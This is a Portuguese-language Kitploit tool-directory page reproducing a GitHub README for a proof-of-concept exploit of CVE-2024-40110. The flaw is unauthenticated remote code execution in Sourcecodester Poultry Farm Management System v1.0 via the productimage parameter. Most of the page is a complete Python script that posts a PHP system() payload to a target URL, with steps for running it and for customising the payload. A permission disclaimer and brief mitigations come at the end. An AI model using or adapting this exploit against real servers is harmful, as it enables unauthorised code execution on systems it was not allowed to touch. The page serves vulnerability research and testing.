Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-40110 — Script de prova de conceito que demonstra execução remota de código não autenticada no Sourcecodester Poultry Farm Management System por meio do parâmetro vulnerável productimage. | Kitploit
Ferramentas/GitHubGitHub/abdurahmon3236/cve-2024-40110
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubabdurahmon3236/cve-2024-40110

CVE-2024-40110

Script de prova de conceito que demonstra execução remota de código não autenticada no Sourcecodester Poultry Farm Management System por meio do parâmetro vulnerável productimage.

Ver Repositório
2há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito (PoC) para Execução Remota de Código Não Autenticada no Sourcecodester Poultry Farm Management System v1.0

Este repositório contém um script de Prova de Conceito (PoC) que demonstra uma vulnerabilidade de execução remota de código (RCE) não autenticada no Sourcecodester Poultry Farm Management System v1.0. A vulnerabilidade existe no parâmetro productimage em /farm/product.php, permitindo que um invasor execute código arbitrário no servidor.

Índice

  • Descrição da Vulnerabilidade
  • Configuração e Uso
    • Script PoC
  • Considerações Importantes
  • Mitigação

Descrição da Vulnerabilidade

CVE-ID: (Pendente)

Visão Geral: O Sourcecodester Poultry Farm Management System v1.0 contém uma vulnerabilidade de execução remota de código (RCE) não autenticada através do parâmetro productimage em . Esta vulnerabilidade permite que um invasor execute código arbitrário no servidor sem autenticação.

/farm/product.php

Versão Afetada:

  • Sourcecodester Poultry Farm Management System v1.0

Configuração e Uso

Pré-requisitos

  • Python 3.x
  • Biblioteca requests (pip install requests)

Script PoC

Este script demonstra como um invasor pode explorar a vulnerabilidade RCE enviando uma requisição maliciosa para o parâmetro vulnerável.

Salve o seguinte script como rce_poc.py e execute-o.

root@kitploit:~
import requests

# Configuração
target_url = "http://target-url/farm/product.php"  # Altere para a URL alvo

# Payload malicioso
# O payload deve ser um comando que o servidor possa executar, ex.: 'ls' para listar diretórios
# Aqui, estamos usando um payload PHP simples para demonstrar o RCE
payload = "<?php system('ls'); ?>"

# Construir a requisição maliciosa
data = {
    'productimage': payload  # O parâmetro vulnerável
}

def exploit_rce(url, data):
    """
    Explora a vulnerabilidade RCE enviando uma requisição maliciosa para a URL alvo.

    Args:
        url (str): A URL alvo.
        data (dict): Os dados a serem enviados na requisição POST.
    """
    try:
        response = requests.post(url, data=data)
        
        # Imprimir os detalhes da resposta
        print("Código de Status:", response.status_code)
        print("Corpo da Resposta:", response.text)
        
        if response.status_code == 200:
            print("[+] Payload executado com sucesso.")
        else:
            print("[-] Falha ao executar o payload.")
    except requests.RequestException as e:
        print(f"[-] Ocorreu um erro: {e}")

if __name__ == "__main__":
    print(f"Enviando requisição maliciosa para: {target_url}")
    exploit_rce(target_url, data)

Explicação

  1. Configuração: Defina target_url para o endpoint /farm/product.php do servidor vulnerável.
  2. Payload: O payload é um payload simples de execução de comando PHP. Você pode modificá-lo para executar comandos diferentes conforme necessário.
  3. Construir a Requisição: O script constrói uma requisição POST com o payload malicioso no parâmetro productimage.
  4. Função de Exploração: A função exploit_rce() envia a requisição maliciosa para a URL alvo e imprime os detalhes da resposta.
  5. Executar o Script: Quando executado, o script tentará explorar a vulnerabilidade RCE e imprimirá os resultados.

Considerações Importantes

  • Permissões: Certifique-se de ter permissão explícita para testar esta vulnerabilidade no sistema alvo. Testes não autorizados são ilegais e antiéticos.
  • Ambiente de Teste: Realize este teste em um ambiente controlado para evitar impactar sistemas de produção.
  • Personalização do Payload: Personalize o payload conforme necessário para alcançar a execução do comando desejado.

Mitigação

Para mitigar esta vulnerabilidade, aplique as seguintes etapas:

  • Validação de Entrada: Implemente validação de entrada adequada para sanitizar entradas do usuário.
  • Restrições de Upload: Restrinja uploads de arquivos para permitir apenas tipos de arquivo específicos e imponha limites de tamanho.
  • Atualização de Software: Atualize regularmente seu software para a versão mais recente para aplicar correções e patches de segurança.

Seguindo estas etapas de mitigação e práticas recomendadas de segurança, você pode evitar vulnerabilidades como este problema de RCE no Sourcecodester Poultry Farm Management System v1.0.

Baixar ferramenta